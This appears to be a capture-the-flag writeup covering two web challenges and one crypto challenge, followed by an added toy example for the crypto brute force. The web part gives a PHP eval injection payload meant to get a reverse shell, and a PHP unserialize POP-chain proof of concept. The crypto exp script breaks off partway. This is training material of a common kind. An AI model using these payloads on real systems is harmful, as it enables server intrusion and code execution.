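WEB

what's my name

Construct the payload:

```
d0g3=12345include'"]);}eval($_POST[1]);/*&name=%00lambda_36
```

Use Burp Suite (bp) to send the request repeatedly until it spawns a reverse shell.

Once you have the shell, check the environment variables to find the flag.

easy_unserialize

Construct the POC:

```php
<?php
error_reporting(0);

class Luck {
    public $l1;
    public $md5;
}

class You {
    public $y1;
}

// Build the chain: You -> Luck -> Luck, with "phpinfo" in the inner l1
$a = new You();
$a->y1 = new Luck();
$a->y1->md5 = new Luck();
$a->y1->md5->l1 = "phpinfo";
echo serialize($a);
// O:3:"You":1:{s:2:"y1";O:4:"Luck":2:{s:2:"l1";N;s:3:"md5";O:4:"Luck":2:{s:2:"l1";s:7:"phpinfo";s:3:"md5";N;}}}
?>
```

Crypto

010101

The key to this challenge is these two lines:

```python
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'
```

This means that one 1 in p1 has been changed to 0. p2, on the other hand, may end up unchanged, because the index is drawn from p1 and p2 may already hold a 1 at that position.

Brute force is enough: iterate over the 0s in p1 and change each 0 to 1 in turn. Note that p2 has to be handled in two cases: one where it is unchanged, and one where it was changed.

exp:

```python
from Crypto.Util.number import *
import gmpy2
from tqdm import *
n =60392904126
```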
………………………………
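The brute force described for 010101, as an added example that is not the writeup's own exp. It assumes p's bit string is split into halves p1 and p2 and that n = p*q, uses constructed toy primes, and the names `corrupt` and `recover` are hypothetical. It goes one step beyond the text by limiting the "p2 changed" case to positions where p1 holds '0', which follows from the index being drawn from p1.

```python
import random

# Constructed toy instance: two well-known 30-bit primes stand in for the real ones.
P, Q = 1000000007, 998244353
N = P * Q

def corrupt(p, rng):
    """Assumed leak model: split p's bit string in half, then apply the two
    lines quoted in the writeup (both index lists come from p1)."""
    bits = bin(p)[2:]
    half = len(bits) // 2
    p1, p2 = list(bits[:half]), list(bits[half:])
    p1[rng.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
    p2[rng.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'
    return ''.join(p1), ''.join(p2)

def recover(n, p1, p2):
    """Undo the corruption by exhaustive search, confirming each guess with n % p."""
    for i, c in enumerate(p1):
        if c != '0':
            continue                       # the cleared bit is now a '0' in p1
        hi = p1[:i] + '1' + p1[i + 1:]
        # Case 1: p2 unchanged (the chosen index already held '1').
        lows = [p2]
        # Case 2: one '1' in p2 used to be '0'; its index is a '0' position of p1.
        lows += [p2[:j] + '0' + p2[j + 1:]
                 for j, d in enumerate(p2)
                 if d == '1' and j < len(p1) and p1[j] == '0']
        for lo in lows:
            cand = int(hi + lo, 2)
            if cand > 1 and n % cand == 0:
                return cand
    return None

if __name__ == "__main__":
    p1, p2 = corrupt(P, random.Random(2023))
    print(p1, p2, recover(N, p1, p2) == P)
```

At the challenge's real size the same loops apply unchanged; the candidate count is roughly (zeros in p1) times (ones in p2 at those positions, plus one).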